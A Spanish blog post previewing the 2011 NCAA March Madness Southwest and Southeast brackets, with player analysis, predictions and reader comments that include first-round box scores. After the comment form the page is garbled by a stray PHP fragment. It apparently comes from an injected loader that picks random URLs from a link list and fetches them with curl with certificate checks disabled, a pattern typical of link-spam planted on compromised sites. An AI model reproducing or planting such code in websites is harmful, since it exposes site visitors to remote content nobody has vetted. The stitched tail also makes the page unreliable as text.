Los Cardinals de Louisville llegan al torneo final tras perder en la final del Big East contra UConn. Tienen una de las plantillas más extensas del torneo. En la pintura el pívot Terrence Jennings y el alapívot novato Gorgui Dieng son la referencia. Y en el perímetro, el escolta Pestron Knowles es su máximo anotador y además cuenta con los bases Kyle Kuric y Peyton Siva. También ha dejado buenas sensaciones el alero Rakeem Buckles pero no ha contado con muchos minutos. Louisville ha tenido mala suerte en su primer enfrentamiento ya que se tendrá que ver las caras con una de las atracciones individuales del torneo, el alapívot Kenneth Faried, aspirante a top 20 del draft. Faried es su gran atleta y destaca por su poder defensivo. En su cuarto año ha promediado 18 puntos y casi 15 rebotes, siendo el máximo reboteador del año. El ganador se enfrentará contra el vencedor del Vanderbilt-Richmond. Los Commodores de Vanderbilt han obtenido su clasificación gracias a victorias contra rivales importantes como North Carolina, Marquette o Kentucky. El escolta tirador John Jenkins en su segundo año ha dado un salto cualitativo llegando a promediar 20 puntos con un 40% en tiros de 3. El alero Jeffery Taylor es otro jugador importante en Vanderbilt. Richmond dio la campanada consiguiendo el título de la Atlantic 10 contra pronóstico. El alapívot Justin Harper que promedia 18 puntos y 7 rebotes y el base Kevin Anderson son los jugadores más destacados de los Spiders.

Los Boilermakers de Purdue volvieron a perder a Robbie Hummel por lesión esta temporada. Pero aun así, han vuelto estar en lo más alto del ranking del país, en el puesto 13. JaJuan Johnson mejora año tras año y ha promediado 21 puntos y 8 rebotes. El escolta E’Twaun Moore, en su último año en la universidad tambien ha tenido una actuación destacada, como detalle son los 38 puntos en la victoria contra Ohio State(#1). No deberá haber problemas contra Saint Peters Peacocks y se cruzaran con el emparejamiento entre Georgetown y VCU. Los Hoyas de Georgetown como ha pasado en los últimos años han sido muy irregulares. En los últimos partidos tienen un balance de 1-5 en contra. Austin Freeman, escolta de cuarto año es el máximo anotador con 18 puntos. Virginia Commonwealth se ha metido desde la preliminar contra USC gracias al buen partido del alapívot Jamie Skeen que ha promediado 15 puntos y 8 rebotes.

Ben Hansbrough, hermano de Tyler (Indiana Pacers) y jugador de Notre Dame ha sido la gran sorpresa de la conferencia Big East. Ben ha llevado a Notre Dame a cotas más altas de lo que consiguió Luke Harangody. Promedia 18 puntos, 4 rebotes y 4 asistencias con un 44% en tiros de 3p. Notre Dame ha formado una buena plantilla donde también hacen un buen papel los aleros Carleton Scott y Tim Abromaitis. Les espera una eliminatoria cómoda contra los Zips de Akron y más adelante esperaran rival del duelo Texas A&M-Florida State. Los Aggies de Texas A&M han tenido una meritoria temporada llegando a semifinales del torneo Big 12. Los aleros Krhis Middleton y Nathan Walkup son el principal arma de un quinteto muy fuerte físicamente. En frente, los Seminoles de Florida State estarán muy pendientes de la posible vuelta de Chris Singleton tras la lesión que le ha dejado en el dique seco los últimos seis partidos y donde Florida State ha notado demasiado su baja. El alapívot de primer año Bernard James ha sido su sustituto y a pesar de su poca experiencia ha dejado buenas sensaciones.

Pronóstico:

Semifinales regionales: Kansas vs Louisville / Purdue vs Notre Dame

Clasificado para la Final Four: Kansas

Southeast Regional (New Orleans, LA)

Los Panthers de Pittsburgh son el único cabeza de serie que no ha ganado el torneo de su conferencia. Pitts se vió sorprendida por el partidazo de Kemba Walker que los dejó en la cuneta tras haber quedado campeones de la liga regular en la Big East con un balance total de 27-5. Los Panthers tienen una plantilla muy experta, extensa y completa donde destaca los escoltas Gilbert Brown, Brad Wanamaker, el pívot Gary McGhee o el base Ashton Gibbs. No se espera mucha resistencia en su primer partido contra North Carolina-Asheville y lo más probable es que su primer partido en serio sea contra el vencedor del Butler-Old Dominion. Los Bulldogs fueron el año pasado la gran atracción del torneo donde estuvieron a punto de dar la campanada en la final contra Duke. La marcha de Gordon Hayward a Utah será un lastre muy difícil de superar. El base Shelvin Mack continúa con su progresión y será muy importante como demostró el año pasado. El poste alto también estará bien representado con Matt Howard y Andrew Smith. A pesar de ser octava cabeza de serie ha tenido suerte en su emparejamiento con Old Dominion. Los de Virginia han sido campeones por segundo año consecutivo en su conferencia, donde Frank Hassell, alapívot de cuarto año ha sido su jugador más determinante.

El tercer puesto en la liga regular de la difícil conferencia Big Ten ha aupado a los Badgers de Wisconsin al puesto 16 del Ranking AP y su clasificación al March Madness. El trio que forman el alapívot Jon Leuer que promedia 19 puntos, el base Jordan Taylor que asiste 5 balones por partido y el alero Keaton Nankivil es la columna vertebral de un equipo con grandes aspiraciones pero con muy poca mentalidad y criterio como se pudo ver en la paliza que les endosó Ohio State (65-93) o el descalabro que tuvieron contra Penn State (33-36). Tendrán que tener cuidado con los campeones de la Atlantic Sun, los Bruins de Belmont que han conseguido un balance de 30-4 dominando absolutamente la conferencia. En la otra eliminatoria Kansas State tendrá que jugársela contra Utah State. Los Wildcats de Kansas State han terminado como cuartos del Big 12. El escolta Jacon Pullen con 20 puntos por partido es su jugador más determinante y aparece en algunos mockdraft como posible segunda ronda. Los Aggies de Utah State por su parte han ganado tanto la regular season como el torneo de postemporada de la WAC Conference y gracias al balance de 30-3 se han situado en el puesto 19 del Ranking. También es cierto que en sus dos enfrentamientos contra equipos del March Madness han salido derrotados. Un año más, el alero Tai Wesley ha sido su mejor jugador con promedios de 15 puntos y 8 rebotes.

Este parece ser el año de los Cougars de Brigham Young. Han conseguido compartir el título de la liga regular en la conferencia Mountain West con San Diego State aunque perdieran la final del torneo contra estos mismos. Sin duda, su jugador más importante es el base Jimmer Fredette, mejor anotador del año con 28,5 puntos por partido. A destacar su mejor partido con 52 puntos contra New Mexico en las semifinales de conferencia. Jimmer opta por el momento a top 10 del próximo draft. El partido contra Wofford a priori será un mero trámite y se jugaran el pase al Sweet 16 contra el ganador del St John’s-Gonzaga. Los Red Storm de Saint John’s consiguen después de nueve años entrar en el torneo final de la NCAA. Han completado una temporada muy seria con victorias ante Duke, UConn, Marquette, Pittsburgh, Villanova o Notre Dame. Dj Kennedy, alero de cuarto año, el alero Justin Brownlee y el base Dwight Hardy forman la columna vertebral. Gonzaga ha conseguido entrar en el torneo gracias a su victoria en la final de la West Coast ante Saint Mary’s. El pívot Robert Sacre y el alero Elias Harris son sus jugadores más destacados.

Por último en la última parte del cuadro, los Florida Gators llegan tras perder la final de la SEC Conference contra Kentucky después de dominar con facilidad la conferencia. Chandler Parsons, alero de cuarto año, el base Ervin Walker y el escolta Kenny Boynton dan forma a una plantilla muy sólida. Los Gators no tienen tantas aspiraciones a llegar a la Final Four desde que fueron campeones en 2007 con Brewer, Horford y Noah. Se estrenarán contra la Universidad de California en Santa Barbara donde no deben tener problemas y más tarde se podrán cruzar contra el ganador del Michigan State – UCLA. El equipo de Tom Izzo, sorprende año tras año donde ha conseguido estar en la Final Four por dos años consecutivos. Kalin Lucas, un año más vuelve a ser el jugador más importante con 17 puntos. Los Bruins de UCLA vuelven tras un año fuera al March Madness tras quedar subcampeón de la regular season en la Pacific 10. El escolta Tyler Honeycutt que promedia 13 puntos y 7 rebotes está subiendo como la espuma en los mockdraft donde ya le sitúan en top15. También el base Malcolm Lee puede entrar en segunda ronda del draft.

Pronóstico:

Semifinales regionales: Butler vs Wisconsin / BYU vs Florida

Clasificado para la Final Four: BYU

Comenta

9 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    OMG! Te has salido, Kantonyo. Impresionante análisis, al menos para alguien que no tiene la más mínima idea de NCAA, como es mi caso. Te aseguro que el baloncesto universitario gana mucho si lo sigo a través de tus textos, jeje, porque los partidos me parecen insoportables.

    Enhorabuena.

      Citar

  2. Viva_Dirk dice:
    #2

    Tremendo trabajo tio, ya iremos comentando segun avance la competición.

      Citar

  3. Sempren dice:
    #3

    Un lujo poder leer análisis así de la NCAA

      Citar

  4. portu dice:
    #4

    Tremendo análisis, impresionante… a ver si este año puedo ver algo…

      Citar

  5. kantonyo dice:
    #5

    Ya se ha disputado la primera ronda y ha habido muy pocas sorpresas.

    Lo más destacado fue la vuelta de Kiriy Irving en Duke tras su grave lesión, recordamos que era el número 1 de todos los mockdraft. Hasta hace poco se pensaba que no iba a poder disputar el torneo. También volvió de una grave lesión, Chris Singleton en Florida State.

    Todos los favoritos pasaron, y la única “sorpresa” podemos encontrarla en el (4)Louisville-(12)Morehead donde como ya avisamos el alapívot Kenneth Faried dio una lección defensiva con 12 puntos y 17 rebotes anulando completamente a Terrence Jennings. Faried es todo un perro de presa.

    La otra leve sorpresa fue la derrota de Georgetown (6) contra VCU (11) a pesar de la gran actuación de Hollis Thompson con 26 puntos.

    A destacar también la derrota de Michigan State, que había llegado a las dos últimas final four. Mal partido de Kalin Lucas y sorprendente actuación de Draymond Green con triple doble, 23 ptos, 11 rebotes, 10 asistencias y 4 robos. Draymond era una de las promesas a seguir a principios de año, pero venía de un rendimiento bajísimo en las últimas semanas, una pena que nos quedemos sin saber si hubiera seguido a este ritmo.

      Citar

  6. kantonyo dice:
    #6

    Estos fueron las estadisticas de los jugadores más importantes del torneo:

    EAST:
    Jared Sullinger (Ohio State) 11 ptos (5/7), 9 reb
    Demontez Stit (Clemson) 16 ptos (6/17), 2 reb, 3 asis (eliminado)
    Jerai Grant (Clemson) 13 ptos (5/10), 6 reb (eliminado)
    Kevin Jones (West Virginia) 17 ptos (6/11), 9 reb
    Terrence Jones (Kentucky) 10 ptos (4/8), 2 reb
    Brandon Knight (Kentucky) 2 ptos (1/8), 2 reb, 5 asis
    Jimmy Butler (Marquette) 15 ptos (5/8), 5 reb, 4 asis
    Darius Johnson-Odom (Marquette) 19 ptos (6/11), 2 asis
    Jae Crowder (Marquette) 10 ptos (4/6) 6 reb
    Tu Holloway (Xavier) 5 ptos (1/8), 2 reb, 5 asis (eliminado)
    Rick Jackson (Syracuse) 23 ptos (7/12), 7 reb, 2 tap
    Kris Joseph (Syracuse) 12 ptos (3/9), 10 reb, 4 asis
    Scoop Jardine (Syracuse) 9 ptos (3/5) 1 reb, 9 asis, 3 rob
    Isaiah Thomas (Washington) 19 ptos (6/14), 7 asis
    Matthew Bryan-Amaning (Washing) 8 ptos (3/8), 6 reb
    Trey Thompkins (Georgia) 26 ptos (11/14), 11 reb (eliminado)
    John Henson (North Carolina) 28 ptos (10/16) 11 reb, 6 tap
    Harrison Barnes (North Carolina) 24 ptos (9/19) 16 reb, 3 asis, 2 rob
    Tyler Zeller (North Carolina) 32 ptos (9/14) 9 reb, 3 tap
    Kendall Marshall (North Carolina) 3 ptos (1/2), 2 reb, 10 asis

    WEST:
    Kyle Singler (Duke) 11 ptos (4/9), 3 reb
    Nolan Smith (Duke) 9 ptos (3/7), 2 reb, 7 asis
    Kyrie Irving (Duke) 14 ptos (4/8), 4 reb, 2 rob
    Jordan Morgan (Michigan) 10 ptos (5/6), 3 reb
    Darius Morris (Michigan) 8 ptos (4/12), 6 reb, 9 asis
    Tim Hardaway Jr (Michigan) 11 ptos (5/9), 5 reb, 3 asis
    Tobias Harris (Tennesse) 19 ptos (6/11), 5 reb, 2 tap (eliminado)
    Scotty Hopson (Tennesse) 4 ptos (1/5), 3 per (eliminado)
    Derrick Williams (Arizona) 22 ptos (6/11), 10 reb
    Will Barton (Memphis) 12 ptos (6/14), 4 reb, 4 asis, 2 rob (eliminado)
    Tristan Thompson (Texas) 17 ptos (7/14) 10 reb, 7 tap
    Jordan Hamilton (Texas) 19 ptos (8/17) 10 reb, 3 asis
    Cory Joseph (Texas) 11 ptos (3/10), 2 reb, 3 asis
    Reggie Hamilton (Oakland) 25 ptos (10/19), 6 reb, 5 asis (eliminado)
    Ricardo Ratliffe (Missouri) 13 ptos (6/12) 4 reb (eliminado)
    Laurence Bowen (Missouri) 10 ptos (4/11) 6 reb (eliminado)
    Marcus Denmon (Missouri) 10 ptos (3/11) 6 reb, 4 asis (eliminado)
    Yancy Gates (Cincinnati) 18 ptos (7/8), 11 reb
    Dion Dixon (Cincinnati) 16 ptos (5/13) 6 reb
    Kemba Walker (UConn) 18 ptos (5/11) 8 reb, 12 asis, 2 rob
    Jeremy Lamb (UConn) 16 ptos (6/9), 2 reb
    Alex Oriakhi (UConn) 9 ptos (4/9), 12 reb, 2 tap
    Jeff Brooks (Penn State) 6 ptos (3/6), 2 reb (eliminado)
    Talor Battle (Penn State) 23 ptos (9/21), 2 reb, 3 asis (eliminado)
    Juan Fernandez (Temple) 23 ptos (8/13), 3 reb, 3 asis
    Ramone Moore (Temple) 23 ptos (10/16)
    Devon Beitzel (Northern Colorado) 25 ptos (8/17), 3 reb (eliminado)
    Kawhi Leonard (San Diego St) 21 ptos (9/14), 10 reb

    SOUTHWEST:
    Marcus Morris (Kansas) 16 ptos (7/13), 9 reb
    Markieff Morris (Kansas) 15 ptos (5/10), 8 reb
    Tyshawn Taylor (Kansas) 10 ptos (4/8), 7 asis
    Josh Selby (Kansas) 4 ptos (2/6), 2 reb, 2 asis
    Mike Davis (Illinois) 22 ptos (7/13), 9 reb, 5 asis
    Mike Tisdale (Illinois) 6 ptos (3/5), 5 reb
    Demetri McCarney (Illinois) 17 ptos (7/13), 3 reb, 7 asis, 6 per
    Jeffery Taylor (Vanderbilt) 4 ptos (1/10), 9 reb (eliminado)
    John Jenkins (Vanderbilt) 21 ptos (6/9), 2 reb, 3 asis (eliminado)
    Justin Harper (Richmond) 13 ptos (4/12), 4 reb
    Kevin Anderson (Richmond) 25 ptos (10/24), 4 asis
    Kenneth Faried (Morehead St) 12 ptos (4/17), 17 reb
    Terrence Jennings (Louisville) 8 ptos (4/6) 4 reb, 4 tap (eliminado)
    Gorqui Dieng (Louisville) 6 ptos (3/3), 2 reb, 2 tap (eliminado)
    Kyle Kuric (Louisville) 9 ptos (3/7), 6 reb (eliminado)
    Preston Knowles (Louisville) 8 ptos (3/10), 5 asis (eliminado)
    Jamie Skeen (VCU) 12 ptos (3/7), 5 reb, 2 asis
    Brandon Rozzell (VCU) 26 ptos (8/13), 2 reb, 2 rob
    Austin Freeman (Georgetown) 10 ptos (3/14), 6 reb (eliminado)
    Hollis Thompson (Georgetown) 26 ptos (8/10), 7 reb (elminado)
    JaJuan Johnson (Purdue) 16 ptos (6/16), 16 reb, 3 asis, 2 tap
    ETwaun Moore (Purdue) 19 ptos (7/15), 4 reb, 7 per
    Bernard James (Florida St) 10 ptos (5/8), 6 reb, 3 tap
    Chris Singleton (Florida St) 5 ptos (2/5), 2 reb
    Khris Middleton (Texas A&M) 16 ptos (5/11), 5 reb, 4 asis (eliminado)
    Nathan Walkup (Texas A&M) 11 ptos (4/8) (eliminado)
    Tim Abromaitis (Notre Dame) 14 ptos (3/6), 4 reb
    Ben Hansbrough (Notre Dame) 15 ptos (4/11), 3 rob, 6 asis
    Carleton Scott (Notre Dame) 8 ptos (3/8), 14 reb, 3 rob, 3 tap

    SOUTHEAST:
    Asthon Gibbs (Pittsburgh) 26 ptos (9/16), 2 reb
    Gary McGhee (Pittsburgh) 7 ptos (3/7), 11 reb
    Gilbert Brown (Pittsburgh) 9 ptos (2/8), 9 reb
    Brad Wanamaker (Pittsburgh) 6 ptos (2/3), 2 reb, 3 asis
    Matt Howard (Butler) 15 ptos (5/8), 5 reb
    Shelvin Mack (Butler) 15 ptos (5/14), 5 asis
    Andrew Smith (Butler) 11 ptos (5/9), 6 reb, 2 rob
    Frank Hassell (Old Dominion) 20 ptos (7/13), 5 reb, 4 rob (eliminado)
    Jacob Pullen (Kansas St) 22 ptos (6/13), 5 asis
    Curtis Kelly (Kansas St) 15 ptos (5/11), 6 reb, 3 asis
    Tai Wesley (Utah St) 18 ptos (7/10), 6 reb (eliminado)
    Jon Leuer (Wisconsin) 22 ptos (7/12), 7 reb
    Jordan Taylor (Wisconsin) 21 ptos (5/13), 6 asis
    Keaton Nankivil (Wisconsin) 5 ptos (1/2), 3 reb
    Elias Harris (Gonzaga) 15 ptos (5/8), 8 reb, 3 asis
    Marquise Carter (Gonzaga) 24 ptos (6/10), 6 reb, 6 asis, 2 rob
    Robert Sacre (Gonzaga) 9 ptos (4/11), 9 reb
    Dwight Hardy (St John’s) 26 ptos (10/23), 2 asis (eliminado)
    Justin Brownlee (St John’s) 14 ptos (6/13), 2 reb, 3 rob (eliminado)
    Jimmer Fredette (BYU) 32 ptos (10/25), 4 reb, 7 asis
    Noah Dahlman (Wofford) 22 ptos (6/10), 9 reb, 4 per (eliminado)
    Draymond Green (Michigan St) 23 ptos (6/13), 11 reb, 10 asis, 4 rob (eliminado)
    Kalin Lucas (Michigan St) 11 ptos (4/14), 5 asis, 4 per (eliminado)
    Durrell Summers (Michigan St) 15 ptos (6/15), 3 asis (eliminado)
    Tyler Honeycutt (UCLA) 16 ptos (5/9), 6 reb, 5 asis, 2 rob, 3 tap
    Malcolm Lee (UCLA) 16 ptos (4/9), 4 reb, 2 asis, 3 rob
    Orlando Johnson (UCSB) 21 ptos (7/14), 4 reb (eliminado)
    Chandler Parsons (Florida) 10 ptos (4/9), 7 reb, 10 asis
    Kenny Boynton (Florida) 13 ptos (6/9), 4 rob
    Ervin Walker (Florida) 18 ptos (5/8), 6 asis

      Citar

  7. Txusma dice:
    #7

    Buenas actuaciones de Derrick Williams, Harrison Barnes y Kemba Walker (entre otros). Creo q es de los años que más duda veo en el TOP5 del draft. Tengo más o menos claro los jugadores que aparecerán pero ni idea del orden.
    Dicen que el mejor jugador, sin duda, es Kyrie Irving, pero la larga lesión le puede pasar factura. A ver como avanza la March Madness

    Por cierto, el lunes artículo-resumen con los Sweet Sxiteen.

      Citar

  8. sergio dice:
    #8

    Kantonyo cual es maximo ranking que le das a Harrison Barnes (UNC)? No dejo de leer articulos positivos sobre su progresion.

      Citar

  9. kantonyo dice:
    #9

    Yo veo a Harrison Barnes muy verde, sería una apuesta muy arriesgada elegirlo este año para los puestos más altos. Pero vamos a ver como transcurre el March Madness para ver hasta donde llega su mejora ya que empezó bastante mal la temporada y poco a poco ha ido mejorando y realizando grandes partidos. Tampoco creo que sea un jugador que vaya a ser decisivo nada más llegar a la NBA por el tipo de juego que realiza.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>